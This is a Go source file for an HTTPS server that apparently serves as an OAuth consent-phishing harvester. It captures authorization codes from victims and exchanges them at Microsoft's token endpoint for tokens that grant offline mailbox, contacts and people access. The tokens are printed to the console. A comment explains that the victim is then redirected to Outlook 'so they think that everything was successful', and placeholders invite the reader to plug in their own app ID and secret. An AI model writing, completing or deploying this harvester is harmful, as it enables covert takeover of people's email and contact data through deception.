package main

import (
	"crypto/tls"
	"fmt"
	"io/ioutil"
	"net/http"
	"net/url"
	"strings"
)

func requestHandler(w http.ResponseWriter, req *http.Request) {

	u, err := url.Parse(req.RequestURI)
	if err != nil {
		panic(err)
	}
	m, _ := url.ParseQuery(u.RawQuery)
	fmt.Println(u.RawQuery)
	getToken(m["code"][0])
	target := "https://outlook.office365.com/"
	//redirect the user so they think that everything was successful
	http.Redirect(w, req, target, http.StatusTemporaryRedirect)
}

func getToken(code string) {
	Transport := http.Transport{
		TLSClientConfig: &tls.Config{InsecureSkipVerify: false},
	}
	client := http.Client{Transport: &Transport}
	client_id := "fceae27c-cac4-4bd3-947e-xxxxxxx"                        //change to your APP-id
	scope := "offline_access%20people.read%20contacts.read.shared%20mail.read" //change to the permissions you need/want
	redirect_uri := "https%3A%2F%2Fxxx.xxx.xxx.xxx%2Fpermission"                //change to match the Redirect URI you set in your app at apps.dev.microsoft.com
	client_secret := "encoded_pw_secret" //webapps now need a secret password, must be percent encoded


	postData := fmt.Sprintf("client_secret=%s&client_id=%s&scope=%s&code=%s&redirect_uri=%s&grant_type=authorization_code", client_secret, client_id, scope, code, redirect_uri)

	req, err := http.NewRequest("POST", "https://login.windows.net/common/oauth2/v2.0/token", strings.NewReader(postData))
	if err != nil {
		return
	}
	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
	resp, err := client.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		return
	}
	fmt.Println(string(body))
}

func main() {
	fmt.Println("starting")
	http.HandleFunc("/", requestHandler)
	http.ListenAndServeTLS(":443", "/etc/letsencrypt/live/your-cert.pem", "/etc/letsencrypt/live/yourprivkey.pem", nil)
}